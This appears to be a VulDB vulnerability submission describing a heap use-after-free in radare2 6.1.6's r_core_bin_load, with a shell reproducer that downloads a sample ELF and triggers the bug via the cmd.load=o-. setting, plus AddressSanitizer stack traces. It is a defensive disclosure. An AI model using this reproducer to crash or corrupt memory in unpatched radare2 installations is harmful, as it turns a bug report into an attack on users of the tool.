提出 #850388: radareorg radare2 6.1.6 Use After Free情報

タイトルradareorg radare2 6.1.6 Use After Free
説明> This report was generated by AI and manually verified by a human. ## Environment ```sh # copypaste this script into your shell and replace it with the output date r2 -v uname -ms ``` ## Description `r_core_bin_load` in `libr/core/cfile.c` can use a freed IO descriptor after `cmd.load` closes the current descriptor during binary loading. Running radare2 with `cmd.load=o-.` closes the current IO descriptor while `r_core_bin_load` still uses a cached `desc` pointer. ASan reports a heap-use-after-free read at `libr/core/cfile.c:782:14`. The expected behavior is for the loader to avoid using cached descriptor pointers after command hooks can close or replace the active IO descriptor. ## Test PoC: - [run_cmdload_close_cli.sh](https://github.com/Bin-infinite/vuln-validations/blob/main/radare2/target/case-032/pocs/run_cmdload_close_cli.sh) - [probe.elf](https://github.com/Bin-infinite/vuln-validations/blob/main/radare2/target/case-032/inputs/probe.elf) Reproducer: ```sh curl -LO https://raw.githubusercontent.com/Bin-infinite/vuln-validations/main/radare2/target/case-032/inputs/probe.elf ASAN_OPTIONS=abort_on_error=1:symbolize=1:detect_leaks=0:allocator_may_return_null=1 \ UBSAN_OPTIONS=halt_on_error=0:print_stacktrace=0 \ LSAN_OPTIONS=detect_leaks=0 \ ./build/binr/radare2/radare2 -q \ -e scr.color=0 \ -e cmd.load=o-. \ -c q \ probe.elf ``` Expected sanitizer result: ```text ERROR: AddressSanitizer: heap-use-after-free READ of size 4 r_core_bin_load ... libr/core/cfile.c:782:14 ``` Stack trace excerpt: ```text ERROR: AddressSanitizer: heap-use-after-free READ of size 4 #0 r_core_bin_load libr/core/cfile.c:782:14 #1 binload libr/main/radare2.c:575:8 #2 r_main_radare2 libr/main/radare2.c:1541:10 #3 main binr/radare2/radare2.c:119:9 freed by thread T0 here: #0 free #1 r_io_desc_del libr/io/io_desc.c:61:2 #2 r_io_desc_close libr/io/io_desc.c:178:2 #3 cmd_open libr/core/cmd_open.inc.c:2574:11 #4 r_core_cmd_subst_i libr/core/cmd.c:5386:8 #5 r_core_cmd_subst libr/core/cmd.c:4096:10 #6 run_cmd_depth libr/core/cmd.c:6366:9 #7 r_core_cmd libr/core/cmd.c:6469:8 #8 r_core_bin_load libr/core/cfile.c:735:3 previously allocated by thread T0 here: #0 calloc #1 r_io_desc_new libr/io/io_desc.c:12:18 #2 mmap_open libr/io/p/io_default.c:254:15 #3 r_io_desc_open libr/io/io_desc.c:122:18 #4 r_io_open_nomap libr/io/io.c:63:18 #5 r_core_file_open libr/core/cfile.c:962:16 SUMMARY: AddressSanitizer: heap-use-after-free libr/core/cfile.c:782:14 in r_core_bin_load ```
ソース⚠️ https://github.com/radareorg/radare2/issues/26049
ユーザー
 Kery Qi (UID 94424)
送信2026年06月06日 07:33 (30 日 ago)
モデレーション2026年07月05日 18:03 (29 days later)
ステータス承諾済み
VulDBエントリ376377 [radareorg radare2 迄 6.1.6 libr/core/cfile.c r_core_bin_load メモリ破損]
ポイント20

Do you want to use VulDB in your project?

Use the official API to access entries easily!